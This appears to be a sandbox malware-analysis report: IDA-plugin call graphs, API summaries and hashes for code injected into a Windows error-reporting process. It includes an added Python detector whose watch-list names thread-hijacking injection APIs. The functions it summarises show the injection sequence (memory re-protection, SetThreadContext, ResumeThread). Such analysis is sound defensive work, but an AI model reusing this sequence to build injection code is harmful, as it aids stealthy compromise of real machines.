8157->8163 8161 265b3c0104c 5 API calls 8158->8161 8159->8152 8164 265b3c01824 RegCloseKey 8160->8164 8165 265b3c0185f RegCloseKey 8161->8165 8166 265b3c0104c 5 API calls 8162->8166 8163->8135 8164->8156 8165->8157 8167 265b3c0189a RegCloseKey 8166->8167 8167->8163 8189 265b3c16168 8168->8189 8170 265b3c01283 GetProcessHeap 8171 265b3c012ae _invalid_parameter_noinfo 8170->8171 8171->8126 8173 265b3c01327 GetProcessHeap 8172->8173 8174 265b3c0148a RegCloseKey 8172->8174 8180 265b3c0133e _invalid_parameter_noinfo 8173->8180 8174->8136 8175 265b3c01476 GetProcessHeap HeapFree 8175->8174 8176 265b3c01352 RegEnumValueW 8176->8180 8177 265b3c01534 2 API calls 8177->8180 8178 265b3c0141e lstrlenW GetProcessHeap 8178->8180 8179 265b3c013d3 GetProcessHeap 8179->8180 8180->8175 8180->8176 8180->8177 8180->8178 8180->8179 8181 265b3c01443 StrCpyW 8180->8181 8182 265b3c013f3 GetProcessHeap HeapFree 8180->8182 8181->8180 8182->8178 8184 
265b3c011b5 RegCloseKey 8183->8184 8186 265b3c010bf _invalid_parameter_noinfo 8183->8186 8184->8140 8185 265b3c010cf RegEnumValueW 8185->8186 8186->8184 8186->8185 8187 265b3c0114e GetProcessHeap 8186->8187 8188 265b3c0116e GetProcessHeap HeapFree 8186->8188 8187->8186 8188->8186 8190 265b3c16177 8189->8190 9898 265b3c05244 9899 265b3c0524a 9898->9899 9900 265b3c0787c 4 API calls 9899->9900 9901 265b3c0528d 9900->9901 9908 265b3c052ae 9901->9908 9910 265b3c03cd0 9901->9910 9904 265b3c05347 9906 265b3c054cd 9904->9906 9904->9908 9914 265b3c07450 9904->9914 9905 265b3c055cb 9906->9905 9907 265b3c05647 VirtualProtect 9906->9907 9907->9908 9909 265b3c05673 GetLastError 9907->9909 9909->9908 9911 265b3c03ced 9910->9911 9913 265b3c03d5c 9911->9913 9920 265b3c03f40 9911->9920 9913->9904 9915 265b3c07497 9914->9915 9945 265b3c07220 9915->9945 9918 265b3c07950 _log10_special 2 API calls 9919 265b3c074c1 9918->9919 9919->9904 9921 265b3c03f87 9920->9921 9922 265b3c03f64 9920->9922 9923 265b3c03fbd 9921->9923 9940 265b3c03b20 9921->9940 9922->9921 9934 265b3c039f0 9922->9934 9926 265b3c03fed 9923->9926 9927 265b3c03b20 2 API calls 9923->9927 9928 265b3c039f0 3 API calls 9926->9928 9932 265b3c04023 9926->9932 9927->9926 9928->9932 9929 265b3c039f0 3 API calls 9930 265b3c0403f 9929->9930 9931 265b3c0405b 9930->9931 9933 265b3c03b20 2 API calls 9930->9933 9931->9913 9932->9929 9932->9930 9933->9931 9939 265b3c03a11 9934->9939 9935 265b3c03a80 9935->9921 9936 265b3c03a66 VirtualQuery 9936->9935 9936->9939 9937 265b3c03a9a VirtualAlloc 9937->9935 9938 265b3c03acb GetLastError 9937->9938 9938->9939 9939->9935 9939->9936 9939->9937 9944 265b3c03b38 9940->9944 9941 265b3c03ba7 9941->9923 9942 265b3c03b8d VirtualQuery 9942->9941 9942->9944 9943 265b3c03bf2 GetLastError 9943->9944 9944->9941 9944->9942 9944->9943 9946 265b3c0723b 9945->9946 9947 265b3c0725f 9946->9947 9948 265b3c07251 SetLastError 9946->9948 9947->9918 9948->9947 9112 265b3c058c9 9113 265b3c058d0 VirtualProtect 
9112->9113 9114 265b3c058f9 GetLastError 9113->9114 9115 265b3c057e0 9113->9115 9114->9115 9116 265b3c03ac9 9121 265b3c03a16 9116->9121 9117 265b3c03a80 9118 265b3c03a66 VirtualQuery 9118->9117 9118->9121 9119 265b3c03a9a VirtualAlloc 9119->9117 9120 265b3c03acb GetLastError 9119->9120 9120->9121 9121->9117 9121->9118 9121->9119 9626 265b3c0224c GetProcessIdOfThread GetCurrentProcessId 9627 265b3c0227d 9626->9627 9629 265b3c0231a 9626->9629 9633 265b3c0193c OpenProcess 9627->9633 9631 265b3c0228f CreateFileW 9631->9629 9632 265b3c022d3 WriteFile ReadFile CloseHandle 9631->9632 9632->9629 9634 265b3c01968 IsWow64Process 9633->9634 9635 265b3c01991 9633->9635 9636 265b3c01988 CloseHandle 9634->9636 9637 265b3c0197a 9634->9637 9635->9629 9635->9631 9636->9635 9637->9636 8798 265b3c14f50 8799 265b3c14f88 __GSHandlerCheckCommon 8798->8799 8800 265b3c14fb4 8799->8800 8802 265b3c0a0c0 8799->8802 8803 265b3c08c04 _CallSETranslator 4 API calls 8802->8803 8804 265b3c0a0ea 8803->8804 8805 265b3c08c04 _CallSETranslator 4 API calls 8804->8805 8806 265b3c0a0f7 8805->8806 8807 265b3c08c04 _CallSETranslator 4 API calls 8806->8807 8808 265b3c0a100 8807->8808 8808->8800 9949 265b3c14fd0 9959 265b3c08580 9949->9959 9951 265b3c14ff8 9953 265b3c08c04 _CallSETranslator 4 API calls 9954 265b3c15008 9953->9954 9955 265b3c08c04 _CallSETranslator 4 API calls 9954->9955 9956 265b3c15011 9955->9956 9957 265b3c0cc18 17 API calls 9956->9957 9958 265b3c1501a 9957->9958 9960 265b3c085b0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 9959->9960 9961 265b3c086b1 9960->9961 9962 265b3c08674 RtlUnwindEx 9960->9962 9961->9951 9961->9953 9962->9960 8809 265b3c07f52 8810 265b3c089a0 __std_exception_copy 20 API calls 8809->8810 8811 265b3c07f7d 8810->8811 8812 265b3c15b51 __scrt_dllmain_exception_filter 9638 265b3c0c654 9639 265b3c0c66d 9638->9639 9652 265b3c0c669 9638->9652 9640 265b3c0f200 38 API calls 9639->9640 9641 265b3c0c672 9640->9641 9653 265b3c0f75c 
GetEnvironmentStringsW 9641->9653 9644 265b3c0c68b 9669 265b3c0c6c8 9644->9669 9645 265b3c0c67f 9646 265b3c0dcb4 __free_lconv_num 7 API calls 9645->9646 9646->9652 9649 265b3c0dcb4 __free_lconv_num 7 API calls 9650 265b3c0c6b2 9649->9650 9651 265b3c0dcb4 __free_lconv_num 7 API calls 9650->9651 9651->9652 9654 265b3c0c677 9653->9654 9655 265b3c0f78c 9653->9655 9654->9644 9654->9645 9656 265b3c0f7e4 FreeEnvironmentStringsW 9655->9656 9657 265b3c0cf7c 7 API calls 9655->9657 9656->9654 9658 265b3c0f7f7 9657->9658 9659 265b3c0f808 9658->9659 9660 265b3c0f7ff 9658->9660 9663 265b3c0f839 9659->9663 9664 265b3c0f82f 9659->9664 9661 265b3c0dcb4 __free_lconv_num 7 API calls 9660->9661 9662 265b3c0f806 9661->9662 9662->9656 9666 265b3c0dcb4 __free_lconv_num 7 API calls 9663->9666 9665 265b3c0dcb4 __free_lconv_num 7 API calls 9664->9665 9667 265b3c0f837 FreeEnvironmentStringsW 9665->9667 9666->9667 9667->9654 9670 265b3c0c6ed 9669->9670 9671 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 9670->9671 9682 265b3c0c723 9671->9682 9672 265b3c0c72b 9673 265b3c0dcb4 __free_lconv_num 7 API calls 9672->9673 9674 265b3c0c693 9673->9674 9674->9649 9675 265b3c0c79e 9676 265b3c0dcb4 __free_lconv_num 7 API calls 9675->9676 9676->9674 9677 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 9677->9682 9678 265b3c0c78d 9680 265b3c0c7d8 7 API calls 9678->9680 9679 265b3c0cc58 __std_exception_copy 20 API calls 9679->9682 9681 265b3c0c795 9680->9681 9684 265b3c0dcb4 __free_lconv_num 7 API calls 9681->9684 9682->9672 9682->9675 9682->9677 9682->9678 9682->9679 9683 265b3c0c7c3 9682->9683 9685 265b3c0dcb4 __free_lconv_num 7 API calls 9682->9685 9684->9672 9685->9682 9963 265b3c0d1d4 9964 265b3c0d1d9 9963->9964 9965 265b3c0d1ee 9963->9965 9969 265b3c0d1f4 9964->9969 9968 265b3c0dcb4 __free_lconv_num 7 API calls 9968->9965 9970 265b3c0d236 9969->9970 9974 265b3c0d23e 9969->9974 9971 265b3c0dcb4 __free_lconv_num 7 API calls 9970->9971 9971->9974 9972 265b3c0dcb4 __free_lconv_num 7 API calls 9973 
265b3c0d24b 9972->9973 9975 265b3c0dcb4 __free_lconv_num 7 API calls 9973->9975 9974->9972 9976 265b3c0d258 9975->9976 9977 265b3c0dcb4 __free_lconv_num 7 API calls 9976->9977 9978 265b3c0d265 9977->9978 9979 265b3c0dcb4 __free_lconv_num 7 API calls 9978->9979 9980 265b3c0d272 9979->9980 9981 265b3c0dcb4 __free_lconv_num 7 API calls 9980->9981 9982 265b3c0d27f 9981->9982 9983 265b3c0dcb4 __free_lconv_num 7 API calls 9982->9983 9984 265b3c0d28c 9983->9984 9985 265b3c0dcb4 __free_lconv_num 7 API calls 9984->9985 9986 265b3c0d299 9985->9986 9987 265b3c0dcb4 __free_lconv_num 7 API calls 9986->9987 9988 265b3c0d2a9 9987->9988 9989 265b3c0dcb4 __free_lconv_num 7 API calls 9988->9989 9990 265b3c0d2b9 9989->9990 9995 265b3c0d0a4 9990->9995 9996 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 9995->9996 9999 265b3c0d0c0 9996->9999 9997 265b3c0d0f0 9998 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 9997->9998 10000 265b3c0d0f8 9998->10000 9999->9997 10001 265b3c0dcb4 __free_lconv_num 7 API calls 9999->10001 10002 265b3c0d01c 10000->10002 10001->9997 10003 265b3c0cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 10002->10003 10004 265b3c0d038 10003->10004 10005 265b3c0d2ec Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 10004->10005 10006 265b3c0d046 10005->10006 10007 265b3c0cf60 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 10006->10007 10008 265b3c0d04e 10007->10008 10008->9968 9122 265b3c15cd8 9125 265b3c0b7f8 9122->9125 9126 265b3c0b812 9125->9126 9128 265b3c0b85f 9125->9128 9127 265b3c08c04 _CallSETranslator 4 API calls 9126->9127 9126->9128 9127->9128 10009 265b3c107d8 10010 265b3c10802 10009->10010 10011 265b3c0dc3c _invalid_parameter_noinfo 7 API calls 10010->10011 10012 265b3c10821 10011->10012 10013 265b3c0dcb4 __free_lconv_num 7 API calls 10012->10013 10014 265b3c1082f 10013->10014 10015 265b3c0dc3c _invalid_parameter_noinfo 7 API 
[Call-graph edge list emitted by the Joe Sandbox IDA plugin for the module mapped at 0x265b3c00000 in the WerFault process (the same base address as the Memory Dump Source entries that follow). The interactive graph does not survive as text; what it records is the set of function entry points below and the Windows APIs reachable from each one. Symbol names such as __free_lconv_num or __FrameHandler3::* are the plugin's CRT signature matches, not exports of the sample.]
• continuation of the function cut off at the section start: blocks 265b3c10859, 265b3c1084b, 265b3c10862, calling 265b3c0fb7c (4 API calls) and 265b3c0dcb4 __free_lconv_num (7 API calls)
• 265b3c0fd5c: FreeLibrary
• 265b3c119dc: CRT helpers only (265b3c0dc1c __std_exception_copy, 265b3c0e724, 265b3c0dae0 _invalid_parameter_noinfo); no direct API call
• 265b3c0555d: VirtualProtect, GetLastError
• 265b3c10160: EnterCriticalSection / LeaveCriticalSection (via 265b3c10118, 265b3c0cf0c, 265b3c0cf60)
• 265b3c10c60: EnterCriticalSection / LeaveCriticalSection (via 265b3c10be4), 265b3c1103c _invalid_parameter_noinfo
• 265b3c0c0e1: GetModuleHandleW, GetModuleHandleExW, __vcrt_InitializeCriticalSectionEx, FreeLibrary, EnterCriticalSection / LeaveCriticalSection (265b3c0bfe4, 265b3c0c8a0), GetCurrentProcess + TerminateProcess (265b3c0c1c1), ExitProcess (265b3c0c1d9), __free_lconv_num; this has the shape of the CRT's process-exit path
• 265b3c15e65: LeaveCriticalSection
• 265b3c0f86c: HeapReAlloc (265b3c12064 / 265b3c120c2), __std_exception_copy, __free_lconv_num, _invalid_parameter_noinfo
• 265b3c07aec: _CallSETranslator (265b3c08814, 265b3c08c20, 265b3c0a370), __std_exception_copy; no direct API call
• 265b3c087ec: InitializeCriticalSectionAndSpinCount (265b3c0a3c4 via __vcrt_InitializeCriticalSectionEx), DeleteCriticalSection (265b3c08d94 __vcrt_uninitialize_locks), __vcrt_uninitialize_ptd
• 265b3c0b370: C++ exception dispatch (__except_validate_context_record, __FrameHandler3::*, __CxxCallCatchBlock, Is_bad_exception_allowed, std::bad_alloc, Concurrency::cancel_current_task, _CallSETranslator) reaching LoadLibraryExW, FreeLibrary, TlsSetValue, RtlUnwindEx (265b3c09ed4) and EncodePointer (265b3c0b01d)
• 265b3c03bf0: VirtualQuery, GetLastError
• 265b3c108f8: EnterCriticalSection / LeaveCriticalSection, DeleteCriticalSection (265b3c131f8, 265b3c132ac), __free_lconv_num, _invalid_parameter_noinfo
• 265b3c0cafc: __free_lconv_num
• 265b3c0fffc: DeleteCriticalSection (via 265b3c1222c), __free_lconv_num
• 265b3c15cfd: __CxxCallCatchBlock, _CallSETranslator
• 265b3c05d00: SetThreadContext (265b3c05d76), VirtualProtect + FlushInstructionCache (265b3c05e51), VirtualFree (265b3c043f0), 265b3c04e00 (3 API calls), ResumeThread (265b3c05f47), _log10_special. This is the one function in the list whose API sequence (re-protect and flush freshly written code, set a thread's context, resume the thread) is the textbook thread-hijacking injection primitive; it is the function to start from when reversing this module.
• 265b3c15d83: _CallSETranslator (265b3c0892c, 265b3c08c04), 265b3c0cc18 (17 API calls)
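The raw edge list above is not meant to be read by hand. The following is an added example (it is not part of the Joe Sandbox report or its tooling) that parses the plugin's edge-dump format into a call graph, recovers the Windows APIs reachable from each function entry, and flags the SetThreadContext / ResumeThread / VirtualProtect combination seen in the function at 265b3c05d00. The input is copied verbatim from this report's dump for that function and for the benign-looking function at 265b3c0555d. The tokenisation rules (node id, hex address, optional labels, `a->b` edges), the CamelCase heuristic for telling Win32 exports from CRT symbols, and the set of injection-related APIs are this example's own assumptions, not anything documented by Joe Sandbox.

```python
"""Added example: parse a Joe Sandbox IDA-plugin call-graph edge dump, collect the
Win32 APIs reachable from each function entry, and flag thread-hijacking injection.
Not part of the report; the dump format rules below are inferred from the text."""
import re
from collections import defaultdict

# Verbatim excerpt of the edge list in this report (module 0x265b3c00000,
# WerFault process 8): the function at 265b3c05d00, then 265b3c0555d for contrast.
DUMP = (
    "9266 265b3c05d00 9267 265b3c05d0d 9266->9267 9268 265b3c05d19 9267->9268 "
    "9274 265b3c05e2a 9267->9274 9269 265b3c05d9d 9268->9269 "
    "9270 265b3c05d76 SetThreadContext 9268->9270 9270->9269 9271 265b3c05f0e "
    "9273 265b3c05f2e 9271->9273 9276 265b3c043f0 VirtualFree 9271->9276 "
    "9272 265b3c05e51 VirtualProtect FlushInstructionCache 9272->9274 "
    "9275 265b3c04e00 3 API calls 9273->9275 9274->9271 9274->9272 "
    "9279 265b3c05f33 9275->9279 9276->9273 9277 265b3c05f87 "
    "9280 265b3c07950 _log10_special 2 API calls 9277->9280 "
    "9278 265b3c05f47 ResumeThread 9278->9279 9279->9277 9279->9278 "
    "9281 265b3c05fcf 9280->9281 "
    "8817 265b3c0555d 8819 265b3c05564 8817->8819 8818 265b3c055cb 8819->8818 "
    "8820 265b3c05647 VirtualProtect 8819->8820 8821 265b3c05681 8820->8821 "
    "8822 265b3c05673 GetLastError 8820->8822 8822->8821"
)

NODE_ID = re.compile(r"^\d+$")
ADDRESS = re.compile(r"^[0-9a-f]{8,16}$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
# Assumption: Win32 exports are CamelCase with no underscore or '::', while the
# plugin's CRT signature names look like __free_lconv_num or Concurrency::details.
API_NAME = re.compile(r"^[A-Z][a-z]+(?:[A-Z0-9][A-Za-z0-9]*)+$")

# Assumed watch-list: APIs that write code into a thread and redirect it.
INJECTION_APIS = {"SetThreadContext", "ResumeThread", "VirtualProtect",
                  "WriteProcessMemory", "VirtualAllocEx", "CreateRemoteThread",
                  "QueueUserAPC", "NtUnmapViewOfSection"}


def parse_dump(text):
    """Return (nodes, edges): nodes maps id -> (address, [api names]);
    edges maps id -> list of successor ids.  A node starts with an integer id
    followed by a hex address; labels follow until the next node or edge."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(list)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges[m.group(1)].append(m.group(2))
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and ADDRESS.match(tokens[i + 1]):
            current = tok
            nodes[current] = (tokens[i + 1], [])
            i += 1  # skip the address token
        elif current is not None and API_NAME.match(tok):
            nodes[current][1].append(tok)  # "3 API calls" and CRT names are dropped
        i += 1
    return nodes, dict(edges)


def function_roots(nodes, edges):
    """Nodes with no incoming edge are the function entry points of the dump."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return [n for n in nodes if n not in targets]


def reachable_apis(root, nodes, edges):
    """APIs called anywhere reachable from `root` (iterative depth-first walk)."""
    seen, stack, apis = set(), [root], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(nodes[n][1])
        stack.extend(edges.get(n, ()))
    return apis


def classify(text):
    """Map each function entry address to (sorted api list, looks_like_injection)."""
    nodes, edges = parse_dump(text)
    report = {}
    for root in function_roots(nodes, edges):
        apis = reachable_apis(root, nodes, edges)
        hits = apis & INJECTION_APIS
        # Thread redirection pair plus at least one memory-write/protection API.
        suspicious = {"SetThreadContext", "ResumeThread"} <= hits and len(hits) >= 3
        report[nodes[root][0]] = (sorted(apis), suspicious)
    return report


if __name__ == "__main__":
    for addr, (apis, flag) in classify(DUMP).items():
        print(f"{addr}: {'INJECTION-LIKE' if flag else 'no injection pattern'} {apis}")
```

Run against the whole edge list rather than the excerpt, the same walk yields one entry per function root; the heuristic deliberately ignores a lone VirtualProtect (as at 265b3c0555d) because CRT and loader code call it routinely, and only fires when a thread's context is both set and resumed.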

Control-flow Graph
[Graph image (legend: Executed / Not Executed). Basic-block edge list for the function spanning 265b3c02544-265b3c0280f; calls in the blocks: 265b3c22d30, 265b3c15730 (three times), GetFileType, 265b3c01a48, StrCpyW, 265b3c030bc, 265b3c03858, 265b3c03058, 265b3c01cb4.]
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
• Instruction ID: 2ba398b339b45d7998adf309d3898cc53a72a4c5bdb966db2cc6ff8b88e6702c
• Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
• Instruction Fuzzy Hash: 3D71B536200FF185EB76DFA9D8483AA67A4FB8978CF51015ADE4963B8DDE36C504CB00

Control-flow Graph
[Graph image (legend: Executed / Not Executed). Basic-block edge list for the function spanning 265b3c02034-265b3c0224b; calls in the blocks: 265b3c22d70, 265b3c02f18 (twice), 265b3c01bc4, 265b3c01bfc, StrCmpNIW.]
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: S
• API String ID: 756756679-543223747
• Opcode ID: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
• Instruction ID: 9c3f8332a60ebf985cc474ae06c79972bdb1bc4406ddc56b9a3991ca9a897db0
• Opcode Fuzzy Hash: 2c414ab3eb2c8f5067fa8ace7f17c5c48379fbe6073c257fbef930be96b73639
• Instruction Fuzzy Hash: 47519D32B10FB496EB62CFA5E8487A963A5FB0879CF059455DF0532B88DB37D852CB00

Control-flow Graph
[Graph image; no edge list was extracted for this function.]
APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
• Opcode ID: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
• Instruction ID: 0c7a8631214e96392f24a95b004fad989cc9cb6eb6f63dfd97988b1d3db6559d
• Opcode Fuzzy Hash: 5d436592c77a9924c69bcb50891f68179583d79dfa63631e028aef339bed858e
• Instruction Fuzzy Hash: 1BF0A432300EA092E7608BA0F4D8759A360FB44B8CF944024DE495255DDF7EC69CCF00

Control-flow Graph
[Graph image; no edge list was extracted for this function.]
APIs
Memory Dump Source
• Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction ID: 09a4bb8fa8c0f197ce22017bca74e515aea01ce7267fdbcdb8f004f40148343a
• Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
• Instruction Fuzzy Hash: D111C070710EB182FBA09BF0F98D3596290AF5470DF4881A59946A619DEF3BC046CB08

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: GetProcessHeap.KERNEL32 ref: 00000265B3C0163B
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: HeapAlloc.KERNEL32 ref: 00000265B3C0164A
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C016BA
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C016E7
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01701
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01721
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C0173C
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C0175C
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01777
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01797
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C017B2
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C017D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 00000265B3C01ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 00000265B3C01AE5
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C017ED
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C0180D
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01828
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01848
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C01863
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegOpenKeyExW.ADVAPI32 ref: 00000265B3C01883
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C0189E
                                                                                                                                                                                                                                                  • Part of subcall function 00000265B3C01630: RegCloseKey.ADVAPI32 ref: 00000265B3C018A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: 0f1713a559062cbadef8b978ef2a001b288e909bbb0b94c772f6c6a7830ed846
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 863165BD210EB141FB509BA2D948369A3A4EF44BCCF5460A19E09A77DDFF12C851CB50

Control-flow Graph (graph image for function 265b3c02b40 not reproduced; the rendered basic-block graph references the API calls GetModuleHandleA, StrCmpNIW and lstrlenW)
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: b57eab705e623fc815f16bb7541ddbe1a27266721628a3fa6c3c5d7b099dc802
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DB17D72210EF082EBAADFA5D4487A9A3A5FF44B8CF545056DE1963B9CDB36CD40CB40
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: 7ade3d21502b40c3853907b7560cdc77ebab1c4db81e543031cef8de330e69e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD318276315FA09AEB648FA0E8443ED7360FB84708F54402ADB4E57B98EF39C648CB10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1587032415.00000265B3C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000265B3C00000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_265b3c00000_WerFault.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: 52aa95433d79f49b5bf5707deb9ca7d3a2d09c136826a57d0b63d9da71eebdaa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
